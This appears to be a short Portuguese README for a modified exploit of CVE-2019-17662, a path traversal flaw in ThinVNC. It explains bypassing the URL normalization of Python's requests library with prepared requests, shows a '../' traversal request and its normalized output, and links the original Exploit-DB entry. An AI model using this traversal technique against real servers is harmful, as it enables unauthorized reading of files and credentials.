
Exploit para CVE-2019-17662, uma vulnerabilidade de travessia de caminho no ThinVNC, demonstrando bypass de normalização de URL para acessar arquivos arbitrários no servidor alvo.
Código CVE modificado
Usado Prepared Requests, como no módulo requests do python3 normaliza o ../ na URL, como:
Para o código:
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
Resulta em:
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Exploit Original:
https://www.exploit-db.com/exploits/47519